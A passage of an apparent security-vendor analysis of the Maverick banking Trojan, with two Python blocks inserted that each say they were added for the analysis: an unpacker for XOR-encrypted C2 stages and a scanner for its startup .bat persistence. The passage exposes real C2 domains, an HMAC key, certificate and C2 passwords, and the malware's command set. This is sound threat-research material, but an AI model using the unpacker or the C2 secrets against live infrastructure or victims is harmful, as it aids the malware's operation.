  356. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117722" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png" alt="" width="2048" height="840" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-300x123.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-1024x420.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-768x315.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-1536x630.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-853x350.png 853w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-740x304.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-683x280.png 683w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-800x328.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p>
  357. <p>The obfuscation does not hide the method&#8217;s variable names, which means it is possible to reconstruct the function easily if the same function is reused elsewhere. Most of the functions used in this initial stage are the same ones used in the final stage of the banking Trojan, which is not obfuscated. The sole purpose of this stage is to download two encrypted shellcodes from the C2. To request them, an API exposed by the C2 on the &#8220;/api/v1/&#8221; routes will be used. The requested URL is as follows:</p>
  358. <ul>
  359. <li>hxxps://sorvetenopote.com/api/v1/3d045ada0df942c983635e</li>
  360. </ul>
  361. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117723" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png" alt="" width="1788" height="315" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png 1788w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1024x180.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1536x271.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1589x280.png 1589w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-800x141.png 800w" sizes="auto, (max-width: 1788px) 100vw, 1788px" /></a></p>
  362. <p>To communicate with its API, it sends the API key in the &#8220;X-Request-Headers&#8221; field of the HTTP request header. The API key used is calculated locally using the following algorithm:</p>
  363. <ul>
  364. <li>&#8220;Base64(HMAC256(Key))&#8221;</li>
  365. </ul>
<p>An HMAC signs a message under a specific key; in this case, the threat actor uses it to generate the &#8220;API Key&#8221; with the HMAC key &#8220;MaverickZapBot2025SecretKey12345&#8221;. The signed data sent to the C2 is &#8220;3d045ada0df942c983635e|1759847631|MaverickBot&#8221;, with the segments separated by &#8220;|&#8221;. The first segment refers to the specific resource requested (the first encrypted shellcode), the second is the infection&#8217;s timestamp, and the last, &#8220;MaverickBot&#8221;, suggests that this C2 protocol may be reused in future campaigns with different variants of this threat. The signed key ensures that generic tools such as &#8220;wget&#8221; or other HTTP downloaders cannot fetch this stage; only the malware itself can.</p>
<p>The C2 responds with an encrypted Donut shellcode that acts as a loader. From this point, the initial loader follows two different execution paths: another loader for the WhatsApp infector, and the final payload, which we call &#8220;MaverickBanker&#8221;. Each Donut shellcode embeds a .NET executable. The shellcode is encrypted with an XOR scheme whose key is stored in the last bytes of the binary returned by the C2. The decryption algorithm is as follows:</p>
  368. <ul>
  369. <li>Extract the last 4 bytes (int32) from the binary file; this indicates the size of the encryption key.</li>
  370. <li>Walk backwards until you reach the beginning of the encryption key (file size &#8211; 4 &#8211; key_size).</li>
  371. <li>Get the XOR key.</li>
  372. <li>Apply the XOR to the entire file using the obtained key.</li>
  373. </ul>
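<p>The trailer layout above is easy to get wrong by one offset, so here is an added unpacking routine that follows the four steps literally. It is an illustration written for this analysis, not code from the page or from the malware: it assumes the key size is a little-endian int32 and that the XOR key is applied cyclically from offset 0 (the page states neither explicitly), and the sample key and plaintext it round-trips are constructed values, not bytes from a real stage.</p>

```python
import struct
import sys
from itertools import cycle

# Constructed sample values (not taken from the page or from the malware):
# a short PE-like stub stands in for the Donut shellcode, the key is arbitrary.
SAMPLE_KEY = b"SampleXorKey!"
SAMPLE_PLAINTEXT = b"MZ\x90\x00" + bytes(range(64))


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Assumption: the key cycles from offset 0 of the data."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def wrap_with_trailer(plaintext: bytes, key: bytes) -> bytes:
    """Build a blob in the layout the page describes: ciphertext | key | int32 key size.

    Inverse of unwrap_xor_blob; used here only to construct test input.
    """
    return xor_bytes(plaintext, key) + key + struct.pack("<i", len(key))


def unwrap_xor_blob(blob: bytes) -> tuple[bytes, bytes]:
    """Recover (plaintext, key) from a C2 response blob.

    Following the page: read the last 4 bytes as an int32 key size, walk back
    to file_size - 4 - key_size to find the key, then XOR the data with it.
    Only the region before the key is XORed: with a key cycling from offset 0
    this yields the same payload bytes as XORing the whole file, without
    scrambling the trailer that was just parsed.
    """
    if len(blob) < 5:
        raise ValueError("blob too short to hold a key and a key-size trailer")
    (key_size,) = struct.unpack_from("<i", blob, len(blob) - 4)
    if key_size <= 0 or key_size > len(blob) - 4:
        raise ValueError(f"implausible key size {key_size}; trailer layout does not match")
    key_start = len(blob) - 4 - key_size
    key = blob[key_start:len(blob) - 4]
    plaintext = xor_bytes(blob[:key_start], key)
    return plaintext, key


def has_valid_trailer(blob: bytes) -> bool:
    """True if the trailer parses; lets a triage script skip responses that do not match."""
    try:
        unwrap_xor_blob(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Usage: python unwrap.py <c2_response.bin> <out.bin>
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            payload, key = unwrap_xor_blob(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(payload)
        print(f"key ({len(key)} bytes): {key.hex()}; wrote {len(payload)} bytes")
    else:
        # Self-check on the constructed sample when run without arguments.
        blob = wrap_with_trailer(SAMPLE_PLAINTEXT, SAMPLE_KEY)
        assert unwrap_xor_blob(blob) == (SAMPLE_PLAINTEXT, SAMPLE_KEY)
        print("round-trip ok")
```

<p>The bounds check on the key size is the part worth keeping when adapting this to captured traffic: a response that is not a Maverick stage (an error page, a redirect body) will usually fail it, which is a cheap way to tell the stages apart from noise before looking for Donut or PE markers in the output.</p>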
  374. <h2 id="whatsapp-infector-downloader">WhatsApp infector downloader</h2>
  375. <p>After the second Donut shellcode is decrypted and started, it will load another downloader using the same obfuscation method as the previous one. It behaves similarly, but this time it will download a PE file instead of a Donut shellcode. This PE file is another .NET assembly that will be loaded into the process as a module.</p>
  376. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117724" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png" alt="" width="2045" height="818" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png 2045w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-1024x410.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-768x307.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-1536x614.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-875x350.png 875w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-740x296.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-700x280.png 700w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-800x320.png 800w" sizes="auto, (max-width: 2045px) 100vw, 2045px" /></a></p>
<p>One of the namespaces used by this .NET executable is named &#8220;Maverick.StageOne,&#8221; which suggests the attacker regards it as the first stage to be loaded. This download stage is used exclusively to download the WhatsApp infector in the same way as the previous stage. The main difference is that this time it is not an encrypted Donut shellcode, but another .NET executable—the WhatsApp infector—which will be used to hijack the victim&#8217;s account and use it to spam their contacts in order to spread itself.</p>
  378. <p>This module, which is also obfuscated, is the WhatsApp infector and represents the final payload in the infection chain. It includes a script from <a href="https://github.com/wppconnect-team/wppconnect" target="_blank" rel="noopener">WPPConnect</a>, an open-source WhatsApp automation project, as well as the Selenium browser executable, used for web automation.</p>
  379. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117725" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png" alt="" width="1841" height="745" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png 1841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-300x121.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-1024x414.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-768x311.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-1536x622.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-990x400.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-865x350.png 865w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-740x299.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-692x280.png 692w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-800x324.png 800w" sizes="auto, (max-width: 1841px) 100vw, 1841px" /></a></p>
  380. <p>The executable&#8217;s namespace name is &#8220;ZAP&#8221;, a very common word in Brazil to refer to WhatsApp. These files use almost the same obfuscation techniques as the previous examples, but the method&#8217;s variable names remain in the source code. The main behavior of this stage is to locate the WhatsApp window in the browser and use WPPConnect to instrument it, causing the infected victim to send messages to their contacts and thus spread again. The file sent depends on the &#8220;MaverickBot&#8221; executable, which will be discussed in the next section.</p>
  381. <h2 id="maverick-the-banking-trojan">Maverick, the banking Trojan</h2>
  382. <p>The Maverick Banker comes from a different execution branch than the WhatsApp infector; it is the result of the second Donut shellcode. There are no additional download steps to execute it. This is the main payload of this campaign and is embedded within another encrypted executable named &#8220;Maverick Agent,&#8221; which performs extended activities on the machine, such as contacting the C2 and keylogging. It is described in the next section.</p>
  383. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117726" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png" alt="" width="1443" height="1124" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png 1443w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-300x234.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-1024x798.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-768x598.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-449x350.png 449w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-740x576.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-359x280.png 359w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-800x623.png 800w" sizes="auto, (max-width: 1443px) 100vw, 1443px" /></a></p>
<p>Upon the initial loading of Maverick Banker, it will attempt to register persistence using the startup folder. It first checks whether persistence already exists by looking for a .bat file in the &#8220;Startup&#8221; directory; beyond checking that the file exists, it also performs a pattern match for the string &#8220;for %%&#8221;, which is part of the initial loading process. If no such file exists, it generates a new &#8220;GUID&#8221; and removes its first 6 characters. The persistence batch script will then be stored as:</p>
  385. <ul>
  386. <li>&#8220;C:\Users\&lt;user&gt;\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\&#8221; + &#8220;HealthApp-&#8221; + GUID + &#8220;.bat&#8221;.</li>
  387. </ul>
  388. <p>Next, it will generate the bat command using the hardcoded URL, which in this case is:</p>
  389. <ul>
  390. <li>&#8220;hxxps://sorvetenopote.com&#8221; + &#8220;/api/itbi/startup/&#8221; + NEW_GUID.</li>
  391. </ul>
  392. <p>In the command generation function, it is possible to see the creation of an entirely new obfuscated PowerShell script.</p>
  393. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png" alt="" width="1719" height="631" class="aligncenter size-full wp-image-117759" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png 1719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-300x110.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-1024x376.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-768x282.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-1536x564.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-953x350.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-740x272.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-763x280.png 763w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-800x294.png 800w" sizes="auto, (max-width: 1719px) 100vw, 1719px" /></a></p>
<p>First, it creates a variable named &#8220;$URL&#8221; and assigns it the content passed as a parameter, creates a &#8220;Net.WebClient&#8221; object, and calls the &#8220;DownloadString.Invoke($URL)&#8221; function. Immediately after creating these small commands, it encodes them in base64. In general, the script builds a fully obfuscated PowerShell script using functions that automatically and randomly generate PowerShell blocks. The persistence script resembles the initial LNK file used to start the infection.</p>
<p>This persistence mechanism seems a bit strange at first glance, as it always depends on the C2 being online. However, it is in fact clever, since the malware would not work without the C2 anyway. Thus, saving only the bootstrap .bat file ensures that the entire infection remains in memory. Once persistence is in place, it starts its true function, which is mainly to monitor browsers and check whether they open banking pages.</p>
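<p>Because the only on-disk artifact of this chain is the bootstrap batch file, a hunt for it is a cheap host check. The scanner below is an added example written for this article, not a tool from the page or from Kaspersky: it looks under the &#8220;Start Menu\Programs&#8221; directory named above (recursively, so the Startup subfolder is included) for .bat files whose name follows the &#8220;HealthApp-&lt;truncated GUID&gt;.bat&#8221; scheme or whose content carries the &#8220;for %%&#8221; marker, the &#8220;/api/itbi/startup/&#8221; path or the C2 domain from this report. The file names and contents in <code>demo()</code> are constructed lookalikes with an inert <code>echo</code> body; the indicator labels are hypothetical names chosen here.</p>

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators taken from the page: the file name prefix, the "for %%" marker
# the malware itself looks for, and the startup URL path and domain it embeds.
NAME_PATTERN = re.compile(r"^HealthApp-[0-9a-fA-F-]+\.bat$")
CONTENT_INDICATORS = {           # labels are hypothetical, chosen for this example
    "for-loop-marker": "for %%",
    "startup-url-path": "/api/itbi/startup/",
    "c2-domain": "sorvetenopote.com",
}


def default_programs_dir() -> Path:
    """The directory the page names, resolved for the current user on Windows."""
    return Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Windows" / "Start Menu" / "Programs"


def scan_programs_dir(programs_dir: Path) -> list[tuple[str, list[str]]]:
    """Return (path, matched indicators) for every .bat under programs_dir that
    matches the naming scheme or carries at least one content indicator."""
    findings = []
    for bat in sorted(programs_dir.rglob("*.bat")):
        hits = []
        if NAME_PATTERN.match(bat.name):
            hits.append("healthapp-guid-name")
        try:
            text = bat.read_text(errors="replace")
        except OSError:
            text = ""
        for label, needle in CONTENT_INDICATORS.items():
            if needle in text:
                hits.append(label)
        if hits:
            findings.append((str(bat), hits))
    return findings


def demo() -> list[tuple[str, list[str]]]:
    """Run the scanner on a constructed directory: one lookalike, one benign script."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "Programs"
        (root / "Startup").mkdir(parents=True)
        # Constructed lookalike: name shape and markers from the page, inert echo body.
        (root / "HealthApp-ab-cdef-0123-4567-89abcdef0123.bat").write_text(
            "for %%i in (1) do echo https://sorvetenopote.com/api/itbi/startup/PLACEHOLDER-GUID\n"
        )
        (root / "Startup" / "backup.bat").write_text("echo nightly backup\n")
        return [(Path(p).name, hits) for p, hits in scan_programs_dir(root)]


if __name__ == "__main__":
    target = default_programs_dir()
    if not target.is_dir():
        print(f"{target} not found; running on the constructed sample instead")
        for name, hits in demo():
            print(name, ", ".join(hits))
    else:
        for path, hits in scan_programs_dir(target):
            print(path, ", ".join(hits))
```

<p>A name match alone is weak evidence (the prefix is a single string the actor can change), so the report keeps each indicator separately: a file hitting the URL path or domain is worth escalating even if it has been renamed, while a name-only hit deserves a look at the content before acting on it.</p>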
<p>The browsers running on the machine are checked for the domains the victim accesses, so the malware can identify the web page being visited. The program takes the current foreground window (the window in focus) and its PID, and from the PID extracts the process name. Monitoring only continues if the victim is using one of the following browsers:</p>
<ul>
<li>Chrome</li>
<li>Firefox</li>
<li>MS Edge</li>
<li>Brave</li>
<li>Internet Explorer</li>
<li>Specific bank web browser</li>
</ul>
  403. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png" alt="" width="1814" height="636" class="aligncenter size-full wp-image-117760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png 1814w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-768x269.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-1536x539.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-998x350.png 998w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-740x259.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-799x280.png 799w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-800x280.png 800w" sizes="auto, (max-width: 1814px) 100vw, 1814px" /></a></p>
  404. <p>If any browser from the list above is running, the malware will use UI Automation to extract the title of the currently open tab and use this information with a predefined list of target online banking sites to determine whether to perform any action on them. The list of target banks is compressed with gzip, encrypted using AES-256, and stored as a base64 string. The AES initialization vector (IV) is stored in the first 16 bytes of the decoded base64 data, and the key is stored in the next 32 bytes. The actual encrypted data begins at offset 48.</p>
  405. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png" alt="" width="1689" height="1528" class="aligncenter size-full wp-image-117761" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png 1689w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-300x271.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-1024x926.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-768x695.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-1536x1390.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-387x350.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-740x669.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-310x280.png 310w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-800x724.png 800w" sizes="auto, (max-width: 1689px) 100vw, 1689px" /></a></p>
  406. <p>This encryption mechanism is the same one used by <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a banking Trojan also written in .NET and documented by us in early 2024.</p>
  407. <p>If any of these banks are found, the program will decrypt another PE file using the same algorithm described in the <a href="#loader">.NET Loader</a> section of this report and will load it as an assembly, calling its entry point with the name of the open bank as an argument. This new PE is called &#8220;Maverick.Agent&#8221; and contains most of the banking logic for contacting the C2 and extracting data with it.</p>
  408. <h3 id="maverick-agent">Maverick Agent</h3>
  409. <p>The agent is the binary that will do most of the banker&#8217;s work; it will first check if it is running on a machine located in Brazil. To do this, it will check the following constraints:</p>
  410. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117732" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png" alt="" width="693" height="406" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png 693w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-597x350.png 597w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-478x280.png 478w" sizes="auto, (max-width: 693px) 100vw, 693px" /></a></p>
  411. <p>What each of them does is:</p>
  412. <ul>
  413. <li><strong>IsValidBrazilianTimezone()</strong><br />
  414. Checks if the current time zone is within the Brazilian time zone range. Brazil has time zones between UTC-5 (-300 min) and UTC-2 (-120 min). If the current time zone is within this range, it returns &#8220;true&#8221;.</li>
  415. <li><strong>IsBrazilianLocale()</strong><br />
  416. Checks if the current thread&#8217;s language or locale is set to Brazilian Portuguese. For example, &#8220;pt-BR&#8221;, &#8220;pt_br&#8221;, or any string containing &#8220;portuguese&#8221; and &#8220;brazil&#8221;. Returns &#8220;true&#8221; if the condition is met.</li>
  417. <li><strong>IsBrazilianRegion()</strong><br />
  418. Checks if the system&#8217;s configured region is Brazil. It compares region codes like &#8220;BR&#8221;, &#8220;BRA&#8221;, or checks if the region name contains &#8220;brazil&#8221;. Returns &#8220;true&#8221; if the region is set to Brazil.</li>
  419. <li><strong>IsBrazilianDateFormat()</strong><br />
  420. Checks if the short date format follows the Brazilian standard. The Brazilian format is dd/MM/yyyy. The function checks if the pattern starts with &#8220;dd/&#8221; and contains &#8220;/MM/&#8221; or &#8220;dd/MM&#8221;.</li>
  421. </ul>
  422. <p>Right after the check, it will enable appropriate DPI support for the operating system and monitor type, ensuring that images are sharp, fit the correct scale (screen zoom), and work well on multiple monitors with different resolutions. Then, it will check for any running persistence, previously created in &#8220;C:\Users\&lt;user&gt;\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\&#8221;. If more than one file is found, it will delete the others based on &#8220;GetCreationTime&#8221; and keep only the most recently created one.</p>
  423. <h2 id="c2-communication">C2 communication</h2>
<p>Communication uses the WatsonTCP library over SSL tunnels. It uses a locally stored, encrypted X509 certificate to protect the communication, which is another similarity to the Coyote malware. The connection is made to the host &#8220;casadecampoamazonas.com&#8221; on port 443. The certificate is exported in encrypted form, and the password used to decrypt it is &#8220;Maverick2025!&#8221;. After the certificate is decrypted, the client connects to the server.</p>
  425. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117733" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png" alt="" width="2048" height="527" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1024x264.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-768x198.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1536x395.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1360x350.png 1360w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-740x190.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1088x280.png 1088w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-800x206.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p>
  426. <p>For the C2 to work, a specific password must be sent during the first contact. The password used by the agent is &#8220;101593a51d9c40fc8ec162d67504e221&#8221;. Using this password during the first connection will successfully authenticate the agent with the C2, and it will be ready to receive commands from the operator. The important commands are:</p>
  427. <table>
  428. <tbody>
  429. <tr>
  430. <td><strong>Command</strong></td>
  431. <td><strong>Description</strong></td>
  432. </tr>
  433. <tr>
  434. <td>INFOCLIENT</td>
  435. <td>Returns the information of the agent, which is used to identify it on the C2. The information used is described in the next section.</td>
  436. </tr>
  437. <tr>
  438. <td>RECONNECT</td>
  439. <td>Disconnect, sleep for a few seconds, and reconnect again to the C2.</td>
  440. </tr>
  441. <tr>
  442. <td>REBOOT</td>
  443. <td>Reboot the machine</td>
  444. </tr>
  445. <tr>
  446. <td>KILLAPPLICATION</td>
  447. <td>Exit the malware process</td>
  448. </tr>
  449. <tr>
  450. <td>SCREENSHOT</td>
  451. <td>Take a screenshot and send it to C2, compressed with gzip</td>
  452. </tr>
  453. <tr>
  454. <td>KEYLOGGER</td>
  455. <td>Enable the keylogger, capture all locally, and send only when the server specifically requests the logs</td>
  456. </tr>
  457. <tr>
  458. <td>MOUSECLICK</td>
  459. <td>Do a mouse click, used for the remote connection</td>
  460. </tr>
  461. <tr>
  462. <td>KEYBOARDONECHAR</td>
  463. <td>Press one char, used for the remote connection</td>
  464. </tr>
  465. <tr>
  466. <td>KEYBOARDMULTIPLESCHARS</td>
<td>Send multiple characters; used for the remote connection</td>
  468. </tr>
  469. <tr>
  470. <td>TOOGLEDESKTOP</td>
